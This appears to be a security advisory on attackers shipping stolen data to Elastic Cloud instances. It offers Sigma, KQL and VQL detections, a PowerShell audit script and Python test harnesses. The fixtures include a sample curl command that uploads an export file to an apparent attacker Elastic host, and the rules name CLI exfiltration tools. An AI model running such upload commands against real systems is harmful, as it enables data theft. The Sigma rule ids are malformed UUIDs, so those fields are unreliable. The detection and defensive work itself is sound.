Huntress researchers have uncovered a concerning campaign where threat actors actively leverage security vulnerabilities to exfiltrate sensitive data. What sets this campaign apart is the adversary's choice of infrastructure: they are utilizing Elastic Cloud SIEM and associated Elastic endpoints as a "data hub" to manage stolen information.
Instead of traditional Command-and-Control (C2) servers that are easily flagged by threat intelligence feeds, attackers are abusing legitimate cloud services. This "Living off the Land" (LotL) approach in the cloud allows them to blend in with legitimate administrative traffic, making detection significantly harder for organizations relying solely on IP-based blocklists. Defenders must immediately audit outbound traffic to cloud infrastructure and identify unauthorized data pipelines.
Technical Analysis
Affected Products & Platforms:
- Infrastructure Abused: Elastic Cloud (Elasticsearch Service / Elastic Cloud Enterprise), specifically endpoints under *.elastic.co and *.es.elastic-cloud.com.
- Victim Environments: Any organization where a security issue (unpatched vulnerability or credential compromise) has provided initial access, allowing the attacker to execute code or scripts capable of reaching the public internet.
Attack Chain & Exploitation Mechanism:
- Initial Access: The campaign begins with the exploitation of a security vulnerability (the specific CVE is currently being analyzed as part of the broader "security issue" research) or credential theft. This grants the attacker a foothold on a victim workstation or server.
- Data Staging: The attacker identifies sensitive data (credentials, configuration files, databases).
- Infrastructure Abuse: Rather than setting up a bespoke exfiltration server, the attacker utilizes a compromised or fraudulently provisioned Elastic Cloud instance.
- Exfiltration: Using tools such as curl, PowerShell, or Python, or compromised Elastic agents on the victim network, the stolen data is shipped directly to the attacker's Elastic Cloud instance. Elastic is used here not for security monitoring, but as a repository and management interface for the loot.
Exploitation Status:
- Status: Confirmed active exploitation in the wild by Huntress researchers.
- Classification: Data Exfiltration / Infrastructure Abuse.
Detection & Response
━━━ DETECTION CONTENT ━━━
**Sigma Rules**
---
title: Potential Data Exfiltration to Elastic Cloud Infrastructure
id: 8a5b2c11-4d3e-4f8a-9c12-3d4a5e6f7g8h
status: experimental
description: Detects processes attempting to connect to known Elastic Cloud infrastructure, which may indicate abuse of Elastic services for data exfiltration or C2.
references:
    - https://www.infosecurity-magazine.com/news/elastic-cloud-siem-manage-stolen/
author: Security Arsenal
date: 2025/03/25
tags:
    - attack.exfiltration
    - attack.t1567.002
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        DestinationHostname|contains:
            - '.elastic.co'
            - '.es.elastic-cloud.com'
    filter_main_legit_apps:
        Image|contains:
            - '\Program Files\Elastic\'
            - '\Program Files (x86)\Elastic\'
    # Caution: this filter also hides attacker tooling running as SYSTEM or under an
    # administrative account. Consider dropping it and tuning on Image instead.
    filter_main_admin:
        User|contains:
            - 'ADMIN'
            - 'SYSTEM'
    condition: selection and not 1 of filter_main*
falsepositives:
    - Legitimate use of Elastic Cloud by administrators (rare on endpoints)
level: high
---
title: Suspicious CLI Upload to Elastic Cloud
description: Detects command-line tools like curl or PowerShell making web requests to Elastic Cloud endpoints, indicative of manual exfiltration scripts.
id: 9b6c3d22-5e4f-0g9h-1d2e-3f4a5b6c7d8e
status: experimental
author: Security Arsenal
date: 2025/03/25
references:
    - https://www.infosecurity-magazine.com/news/elastic-cloud-siem-manage-stolen/
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_tools:
        Image|endswith:
            - '\curl.exe'
            - '\powershell.exe'
            - '\python.exe'
    selection_cli:
        CommandLine|contains:
            - '.elastic.co'
            - '.es.elastic-cloud.com'
    condition: all of selection_*
falsepositives:
    - Administrator troubleshooting or legitimate DevOps scripts
level: medium
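To see how the two rules above behave, the following Python re-implements their selection and filter logic (Sigma `|contains` and `|endswith` are case-insensitive) and runs it over a handful of constructed Sysmon-style events. This is an added example written for this page, not part of the original article or of any Sigma tooling; the event field names follow the Sigma Windows taxonomy used in the rules, and the hostnames, paths and command lines are placeholders. The third event shows the edge case worth knowing about: a non-Elastic binary running as SYSTEM that is suppressed by `filter_main_admin`, and surfaces only when that filter is removed.

```python
"""Run the two Sigma rules above against constructed Sysmon-style events.

Added example, not from the original article. Field names follow the Sigma
Windows taxonomy used in the rules (Image, User, DestinationHostname,
CommandLine); the events below are constructed, not real telemetry.
"""

ELASTIC_DOMAINS = (".elastic.co", ".es.elastic-cloud.com")
LEGIT_ELASTIC_PATHS = ("\\Program Files\\Elastic\\", "\\Program Files (x86)\\Elastic\\")
ADMIN_MARKERS = ("ADMIN", "SYSTEM")
CLI_TOOLS = ("\\curl.exe", "\\powershell.exe", "\\python.exe")

RULE_NET = "Potential Data Exfiltration to Elastic Cloud Infrastructure"
RULE_CLI = "Suspicious CLI Upload to Elastic Cloud"


def contains_any(value, needles):
    """Sigma '|contains': case-insensitive substring match against any listed value."""
    v = value.lower()
    return any(n.lower() in v for n in needles)


def endswith_any(value, needles):
    """Sigma '|endswith': case-insensitive suffix match against any listed value."""
    v = value.lower()
    return any(v.endswith(n.lower()) for n in needles)


def rule_network_exfil(event, suppress_admin=True):
    """Rule 1: 'selection and not 1 of filter_main*'.

    suppress_admin=False drops the filter_main_admin block so the effect of
    excluding ADMIN/SYSTEM contexts can be compared on the same events.
    """
    selection = contains_any(event.get("DestinationHostname", ""), ELASTIC_DOMAINS)
    filter_legit = contains_any(event.get("Image", ""), LEGIT_ELASTIC_PATHS)
    filter_admin = suppress_admin and contains_any(event.get("User", ""), ADMIN_MARKERS)
    return selection and not (filter_legit or filter_admin)


def rule_cli_upload(event):
    """Rule 2: 'all of selection_*' (CLI tool image AND Elastic domain on the command line)."""
    return endswith_any(event.get("Image", ""), CLI_TOOLS) and contains_any(
        event.get("CommandLine", ""), ELASTIC_DOMAINS
    )


def evaluate(events, suppress_admin=True):
    """Return (event id, rule title) for every rule that fires, in event order."""
    hits = []
    for e in events:
        if e["category"] == "network_connection" and rule_network_exfil(e, suppress_admin):
            hits.append((e["id"], RULE_NET))
        if e["category"] == "process_creation" and rule_cli_upload(e):
            hits.append((e["id"], RULE_CLI))
    return hits


# Constructed sample events (hostnames, paths and users are illustrative placeholders).
SAMPLE_EVENTS = [
    {"id": "evt-1", "category": "network_connection",
     "Image": "C:\\Program Files\\Elastic\\Agent\\elastic-agent.exe",
     "User": "NT AUTHORITY\\SYSTEM",
     "DestinationHostname": "my-deployment.es.elastic-cloud.com"},  # sanctioned shipper
    {"id": "evt-2", "category": "network_connection",
     "Image": "C:\\Users\\j.doe\\AppData\\Local\\Temp\\upd.exe",
     "User": "CORP\\j.doe",
     "DestinationHostname": "abc123.es.elastic-cloud.com"},  # unknown binary, should fire
    {"id": "evt-3", "category": "network_connection",
     "Image": "C:\\Windows\\Temp\\svc.exe",
     "User": "NT AUTHORITY\\SYSTEM",
     "DestinationHostname": "abc123.es.elastic-cloud.com"},  # hidden by filter_main_admin
    {"id": "evt-4", "category": "process_creation",
     "Image": "C:\\Windows\\System32\\curl.exe",
     "CommandLine": "curl.exe -X POST https://abc123.es.elastic-cloud.com:9243/uploads/_doc -d @export.json"},
    {"id": "evt-5", "category": "process_creation",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service"},  # benign admin use
]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print("HIT", *hit)
    # evt-3 only appears once the ADMIN/SYSTEM filter is removed
    print("with admin filter:   ", [h[0] for h in evaluate(SAMPLE_EVENTS)])
    print("without admin filter:", [h[0] for h in evaluate(SAMPLE_EVENTS, suppress_admin=False)])
```

Running the block prints two hits with the rule as written and three without the admin filter, which is the concrete argument for tuning the exclusion on the process image rather than on the user context.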
**KQL (Microsoft Sentinel / Defender)**
// Hunt for outbound network connections to Elastic Cloud endpoints
// Keeps only public destinations to focus on egress traffic
// Sentinel column names are used; in the Defender portal replace TimeGenerated with Timestamp
DeviceNetworkEvents
| where RemoteUrl has "elastic.co" or RemoteUrl has "es.elastic-cloud.com"
| where RemoteIPType == "Public"
// Exclude the official Elastic shippers (the Elastic Agent binary is elastic-agent.exe)
| where InitiatingProcessFileName !in~ ("elastic-agent.exe", "metricbeat.exe", "filebeat.exe", "logstash.exe")
// Byte counts are not part of this table; pair with proxy or firewall logs for volume
| project TimeGenerated, DeviceName, InitiatingUser = InitiatingProcessAccountName, InitiatingProcessFileName, InitiatingProcessFolderPath, RemoteIP, RemoteUrl
| order by TimeGenerated desc
**Velociraptor VQL**
// Hunt for processes whose command line references Elastic Cloud domains and list their
// current remote connections. netstat() exposes IP addresses only, so the domain match is
// done on the command line; confirm the RemoteIP column against DNS or proxy logs.
LET ElasticRe = "\\.elastic\\.co|\\.es\\.elastic-cloud\\.com"

SELECT Pid, Name, Exe, CommandLine, Username, RemoteIP, RemotePort
FROM foreach(
    row={ SELECT Pid, Raddr.IP AS RemoteIP, Raddr.Port AS RemotePort FROM netstat() },
    query={ SELECT Pid, RemoteIP, RemotePort, Name, Exe, CommandLine, Username
            FROM pslist(pid=Pid) })
WHERE CommandLine =~ ElasticRe AND NOT Exe =~ "Program Files\\\\Elastic"
**Remediation Script (PowerShell)**
<#
.SYNOPSIS
    Audit active outbound connections that may reach Elastic Cloud from unexpected processes.
.DESCRIPTION
    Lists established TCP connections to public addresses from processes that are not
    installed under the official Elastic directory, performs a best-effort reverse DNS
    lookup against the Elastic Cloud domains, and writes the findings to a log for
    analyst review. It does not create firewall rules; blocking should follow manual
    confirmation as described in the Remediation section.
#>
$ElasticDomains = @("*.elastic.co", "*.es.elastic-cloud.com")
$LogPath = "$env:TEMP\ElasticCloudAudit.log"
# Adjust to your install location
$LegitPath = "C:\Program Files\Elastic\"
# RFC 1918, loopback and link-local ranges are not egress and are skipped
$PrivateRanges = '^(127\.|10\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[01])\.|169\.254\.|::1$|fe80:)'

Write-Host "[+] Auditing active connections to Elastic Cloud infrastructure..."
$ActiveConnections = Get-NetTCPConnection -State Established |
    Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, State, OwningProcess
$SuspiciousConnections = @()
foreach ($Conn in $ActiveConnections) {
    if ($Conn.RemoteAddress -match $PrivateRanges) { continue }
    $Process = Get-Process -Id $Conn.OwningProcess -ErrorAction SilentlyContinue
    if (-not $Process) { continue }
    # Basic heuristic: flag processes that are NOT running from the official Elastic directory
    if ($Process.Path -like "$LegitPath*") { continue }
    # Best-effort reverse lookup; cloud PTR records often point at the hosting provider,
    # so a non-matching PTR does not clear the connection
    $Ptr = (Resolve-DnsName -Name $Conn.RemoteAddress -Type PTR -ErrorAction SilentlyContinue).NameHost
    $MatchesElastic = $false
    foreach ($Domain in $ElasticDomains) {
        if ($Ptr -like $Domain) { $MatchesElastic = $true }
    }
    $SuspiciousConnections += [PSCustomObject]@{
        ProcessName      = $Process.ProcessName
        PID              = $Process.Id
        Path             = $Process.Path
        RemoteIP         = $Conn.RemoteAddress
        RemotePort       = $Conn.RemotePort
        ReverseDns       = $Ptr
        ElasticDomainPtr = $MatchesElastic
        Timestamp        = Get-Date
    }
}
if ($SuspiciousConnections.Count -gt 0) {
    Write-Host "[!] Potential unauthorized Elastic Cloud connections found." -ForegroundColor Red
    $SuspiciousConnections | Sort-Object ElasticDomainPtr -Descending | Format-Table -AutoSize
    $SuspiciousConnections | Out-File -FilePath $LogPath -Append
    Write-Host "[+] Log saved to $LogPath"
    # Warning: a block rule strictly requires thorough testing to avoid breaking legitimate apps.
    Write-Host "[!] Action Required: Review the log above. If traffic is confirmed malicious, block the specific RemoteIPs using firewall rules."
} else {
    Write-Host "[+] No obvious non-Elastic-agent connections found." -ForegroundColor Green
}
Remediation
- Identify and Isolate Compromised Assets:
  - Use the detection queries above to identify workstations or servers sending data to Elastic Cloud infrastructure that is not authorized by your IT/SecOps teams.
  - Isolate affected systems from the network immediately to prevent further data exfiltration.
- Revoke and Rotate Credentials:
  - Assume any credentials stored on the compromised systems are stolen. Force a password reset for all users with sessions on the affected machines.
  - If API keys or cloud tokens were present, revoke them immediately.
- Restrict Egress Traffic:
  - Firewall Rules: Implement strict egress filtering. Block access to *.elastic.co and *.es.elastic-cloud.com for all endpoints except known jump hosts or servers explicitly designated to run Elastic agents (e.g., your SIEM collectors).
  - Proxy Inspection: Ensure your web proxy inspects SSL/TLS traffic to identify connections attempting to bypass IP-based blocks using domain fronting (if applicable).
- Audit Elastic Cloud Instances:
  - If your organization uses Elastic Cloud, audit your instances for any new indices, users, or API keys created around the time of the compromise.
  - Check access logs for geo-locations or IP addresses that do not belong to your administrator workforce.
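The egress step above reduces to a simple question against proxy logs: which clients other than the designated collectors are talking to *.elastic.co or *.es.elastic-cloud.com, and how much are they sending? The Python below answers it over constructed log lines. It is an added example written for this page, not code from the original article or from any vendor; the Squid-style log format, the approved collector addresses and the deployment hostnames are assumptions. It also shows the matching detail that the `contains`-style checks in the detection content gloss over: a label-aware suffix match accepts `www.elastic.co` and the apex but rejects look-alikes such as `elastic.co.evil.example` or `notelastic.co`.

```python
"""Egress review for the 'Restrict Egress Traffic' step: find hosts reaching Elastic
Cloud domains that are not on the approved list of collectors / jump hosts.

Added example, not from the original article. The proxy log format is a constructed
Squid-style line ("<epoch> <client_ip> <method> <url> <status> <bytes_out>"); the
approved collector addresses and the log lines themselves are assumptions.
"""
from urllib.parse import urlsplit

# Apex domains from the advisory; matching below covers the apex and any subdomain.
ELASTIC_DOMAINS = ("elastic.co", "es.elastic-cloud.com")
# Hypothetical SIEM collectors / jump hosts that are allowed to talk to Elastic Cloud.
APPROVED_COLLECTORS = frozenset({"10.20.0.15", "10.20.0.16"})


def is_elastic_host(hostname):
    """Label-aware suffix match. Unlike a plain substring test this rejects
    look-alikes such as 'elastic.co.evil.example' or 'notelastic.co'."""
    h = hostname.lower().rstrip(".")
    return any(h == d or h.endswith("." + d) for d in ELASTIC_DOMAINS)


def extract_host(url):
    """Host from an absolute URL, or from a CONNECT target of the form host:port."""
    if "://" in url:
        return urlsplit(url).hostname or ""
    return url.rsplit(":", 1)[0] if ":" in url else url


def parse_line(line):
    ts, client, method, url, status, bytes_out = line.split()
    return {"ts": int(ts), "client": client, "method": method,
            "host": extract_host(url), "status": int(status), "bytes_out": int(bytes_out)}


def find_violations(lines, approved=APPROVED_COLLECTORS):
    """Per unapproved client: Elastic hosts contacted, request count and bytes sent."""
    report = {}
    for rec in map(parse_line, lines):
        if not is_elastic_host(rec["host"]) or rec["client"] in approved:
            continue
        entry = report.setdefault(rec["client"], {"hosts": set(), "requests": 0, "bytes_out": 0})
        entry["hosts"].add(rec["host"])
        entry["requests"] += 1
        entry["bytes_out"] += rec["bytes_out"]
    return report


# Constructed log lines (addresses and deployment names are placeholders).
SAMPLE_LOG = [
    "1742900000 10.20.0.15 POST https://my-deployment.es.elastic-cloud.com:9243/_bulk 200 524288",  # approved collector
    "1742900010 10.44.3.27 CONNECT abc123.es.elastic-cloud.com:9243 200 734003",  # unapproved workstation
    "1742900015 10.44.3.27 POST https://abc123.es.elastic-cloud.com:9243/uploads/_doc 201 10240",
    "1742900020 10.44.3.99 GET https://www.elastic.co.evil.example/update 200 512",  # look-alike, not Elastic
    "1742900025 10.44.3.99 GET https://notelastic.co/ 200 100",  # look-alike, not Elastic
    "1742900030 10.44.3.50 GET https://www.elastic.co/downloads 200 2048",  # unapproved, flag for review
]

if __name__ == "__main__":
    for client, info in sorted(find_violations(SAMPLE_LOG).items()):
        print(f"{client}: {info['requests']} requests, {info['bytes_out']} bytes out -> {sorted(info['hosts'])}")
```

The report keys are exactly the hosts that the firewall exception list should not contain; anything listed is either a candidate for the block rule or a collector that needs adding to `APPROVED_COLLECTORS`.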